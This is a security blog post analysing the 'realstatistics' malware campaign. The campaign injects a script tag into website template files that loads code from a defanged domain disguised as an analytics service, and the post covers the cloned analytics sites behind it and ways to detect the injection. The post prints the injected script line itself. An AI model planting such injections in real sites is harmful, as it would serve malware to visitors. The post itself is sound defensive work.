Realstatistics Malware Campaign Uses Fake Analytics Sites

In this post we’ll show you the tactics employed by the realstatistics malware campaign to make their injections seem less suspicious.

The injection looks like this:

<script language="JavaScript" type="text/JavaScript" src="hxxp://realstatistics[.]pro/js/analytics .php?id=123"></script>

The URL appears to be a typical statistics/analytics script: both the domain name and the URL path look relevant.

The script is not encrypted. Moreover, although this attack typically infects template .php files, the injected code is the same plain HTML code that you see above. No obfuscation or dynamic script loading is used. The idea is to make it look as if the script really belongs to the page template since it doesn’t try to use all the dirty tricks to hide itself.

Pretending to Be Real Analytics Sites

What happens if a webmaster is still not convinced and wants to check if the realstatistics[.]pro site really provides some analytical services? If you open the site now (with Safe Browsing warnings turned off) you’ll see this:

This looks like a real service that has something to do with analytics, advertising, and optimization. But wait! Why does it say wywy? It turns out that realstatistics[.]pro is just a clone of the real German wywy Gmbh company site that provides automated content recognition solutions for advertising, analytics, and optimization.

Realstatistics[.]pro is not the only domain used by this malware campaign. The attackers have registered quite a few similar domains. For example, realanalytics[.]pro also displays the wywy clone site.

There are also clones of other analytics websites. Siteanalytics[.]pro is a poor clone of the site for the Dutch OpenTracker service.

Webstatistics[.]pro is a clone of EasyVisitors.

If you don’t pay attention to details, you can be fooled into thinking that the domains provide legitimate services. Of course, Google’s Safe Browsing warning helps reveal the malicious nature of the sites. Unfortunately, not all of these sites are blacklisted by Google so you will not see any warnings if you visit them right now. You might also not see anything in browsers that don’t use Google’s Safe Browsing data.

By the way, the server that hosts realstatistics sites is also known for hosting fake update sites: such as adobesecurupdate[.]com and microsoft-securety[.]com :

Conclusion

Although the Realstatistics malware campaign goes an extra mile to make their injections look less suspicious, it’s still quite easy to spot with website monitoring and file integrity monitoring.

When you see some added code, you don’t have to check whether it’s benign or malicious. All you should do is ask yourself if this code was added by you (or by someone else responsible for the site updates). If not, it doesn’t matter what the code does – its presence means that it was an unauthorized modification and you need to investigate how it happened and assess the damage.

And of course, as a webmaster you should invest some time to getting familiar with the internals of your site so that you can always tell what belongs to your site and what doesn’t.